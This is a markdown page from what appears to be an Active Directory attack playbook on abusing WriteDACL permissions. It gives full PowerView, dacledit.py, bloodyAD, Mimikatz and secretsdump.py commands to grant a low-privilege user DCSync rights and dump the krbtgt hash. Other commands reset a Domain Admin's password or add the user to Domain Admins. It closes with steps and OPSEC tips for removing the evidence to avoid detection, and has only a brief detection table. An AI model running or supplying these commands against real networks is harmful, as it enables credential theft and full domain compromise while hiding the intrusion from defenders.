attack-21-writedacl-abuse.md (7142B)
1 --- 2 title: "Attack #21 โ WriteDACL Abuse" 3 description: "WriteDACL allows an attacker to modify the Discretionary Access Control List of a target AD object โ meaning they can grant themselves (or any principal)โฆ" 4 category: active-directory 5 subcategory: "ACL Abuse" 6 tags: ["active-directory", "credential-access", "privilege-escalation", "hashing"] 7 tools: ["Impacket", "Mimikatz", "BloodHound", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/๐ก Attack #21 โ WriteDACL Abuse.md" 11 --- 12 # ๐ก Attack #21 โ WriteDACL Abuse 13 14 *** 15 16 ## ๐ How It Works 17 18 WriteDACL allows an attacker to **modify the Discretionary Access Control List** of a target AD object โ meaning they can grant themselves (or any principal) **any permission they want** on that object. This is typically used as a **stepping stone**: the attacker grants themselves GenericAll or DCSync rights, then uses those elevated permissions to exploit the target. 19 20 The most devastating use is WriteDACL on the **domain root object** (`DC=corp,DC=local`), which allows the attacker to grant themselves DCSync rights โ enabling extraction of every credential in the domain without Domain Admin privileges. 21 22 ### Exploitation Chain 23 24 ``` 25 1. Identify WriteDACL on a target object (BloodHound / PowerView) 26 2. Add a new ACE granting yourself desired rights: 27 - GenericAll on user/group โ password reset / group membership 28 - DCSync rights on domain root โ extract all hashes 29 3. Exploit the newly granted permissions 30 4. Optionally remove the ACE to cover tracks 31 ``` 32 33 *** 34 35 ## โ๏ธ Prerequisites 36 37 | Requirement | Detail | 38 |---|---| 39 | **WriteDACL ACE on target** | Your controlled principal must have WriteDACL in the target's DACL | 40 | **Domain user account** | Any authenticated domain user | 41 42 *** 43 44 ## ๐ ๏ธ Tools 45 46 | Tool | Platform | Notes | 47 |---|---|---| 48 | **PowerView** | Windows | `Add-DomainObjectAcl` โ add ACEs to DACLs | 49 | **Impacket โ dacledit.py** | Linux | Remote DACL editing | 50 | **bloodyAD** | Linux | `add dcsync`, `add genericAll` shortcuts | 51 | **ldap_shell** | Linux | Interactive LDAP exploitation | 52 53 *** 54 55 ## ๐ป Full Commands 56 57 ### ๐ด WriteDACL on Domain Root โ Grant DCSync 58 59 ```powershell 60 # โโ PowerView โ grant DCSync rights to yourself โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 61 Import-Module .\PowerView.ps1 62 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \ 63 -PrincipalIdentity low_user -Rights DCSync -Verbose 64 65 # โโ Now DCSync โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 66 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit 67 ``` 68 69 ```bash 70 # โโ dacledit.py โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 71 dacledit.py -action write -rights DCSync \ 72 -principal low_user -target-dn "DC=corp,DC=local" \ 73 corp.local/low_user:'Password1' -dc-ip 10.10.10.10 74 75 # Now DCSync 76 secretsdump.py corp.local/low_user:'Password1'@DC01.corp.local -just-dc-user krbtgt 77 78 # โโ bloodyAD โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 79 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \ 80 add dcsync low_user 81 ``` 82 83 ### ๐ด WriteDACL on User โ Grant GenericAll 84 85 ```powershell 86 # โโ Grant GenericAll over a DA account โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 87 Add-DomainObjectAcl -TargetIdentity targetadmin -PrincipalIdentity low_user -Rights All 88 89 # โโ Now reset their password โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 90 $NewPassword = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force 91 Set-DomainUserPassword -Identity targetadmin -AccountPassword $NewPassword 92 ``` 93 94 ```bash 95 # โโ dacledit.py โ grant GenericAll โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 96 dacledit.py -action write -rights FullControl \ 97 -principal low_user -target targetadmin \ 98 corp.local/low_user:'Password1' -dc-ip 10.10.10.10 99 ``` 100 101 ### ๐ด WriteDACL on Group โ Grant Self-Add 102 103 ```powershell 104 # โโ Grant yourself rights to modify group membership โโโโโโโโโโโโโโโโโโโโโโโโโโ 105 Add-DomainObjectAcl -TargetIdentity "Domain Admins" \ 106 -PrincipalIdentity low_user -Rights All 107 108 # โโ Add yourself to Domain Admins โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 109 Add-DomainGroupMember -Identity "Domain Admins" -Members low_user 110 ``` 111 112 ### ๐ด Cleanup โ Remove the ACE 113 114 ```powershell 115 # โโ Remove the ACE you added โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 116 Remove-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \ 117 -PrincipalIdentity low_user -Rights DCSync -Verbose 118 ``` 119 120 ```bash 121 # โโ dacledit.py cleanup โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 122 dacledit.py -action remove -rights DCSync \ 123 -principal low_user -target-dn "DC=corp,DC=local" \ 124 corp.local/low_user:'Password1' -dc-ip 10.10.10.10 125 ``` 126 127 *** 128 129 ## ๐ฏ OPSEC Tips 130 131 - **Always remove the ACE after exploitation** โ leaving DCSync rights on a low-priv user is a permanent IOC 132 - **WriteDACL โ DCSync is the most common escalation path** found in ACL-based attacks 133 - **Event 4662 and 5136 catch DACL modifications** โ but many environments don't audit these events 134 135 *** 136 137 ## ๐ก๏ธ Detection โ Event IDs 138 139 | Event ID | Source | What to Look For | 140 |---|---|---| 141 | **4662** | Security Log (DC) | Object access โ tracks DACL writes on the domain root | 142 | **5136** | Security Log (DC) | Directory Service object modification โ nTSecurityDescriptor changes | 143 | **4670** | Security Log (DC) | Permissions on an object were changed | 144 145 *** 146 147 ## ๐ Attack Chain Context 148 149 ``` 150 [WriteDACL] โโโ Grant Yourself Any Permission 151 โ 152 โโโโ ๐ฉธ Domain root โ DCSync rights โ all domain hashes 153 โโโโ ๐ค User object โ GenericAll โ password reset โ account takeover 154 โโโโ ๐ฅ Group object โ modify membership โ add self to DA 155 โโโโ ๐ Chain: WriteDACL โ DCSync (#37) โ Golden Ticket (#11) 156 โโโโ ๐ Defeated by: audit DACLs, monitor 4670/5136, least privilege 157 ``` 158 159 *** 160 161 > โ **Attack #21 โ WriteDACL Abuse complete.**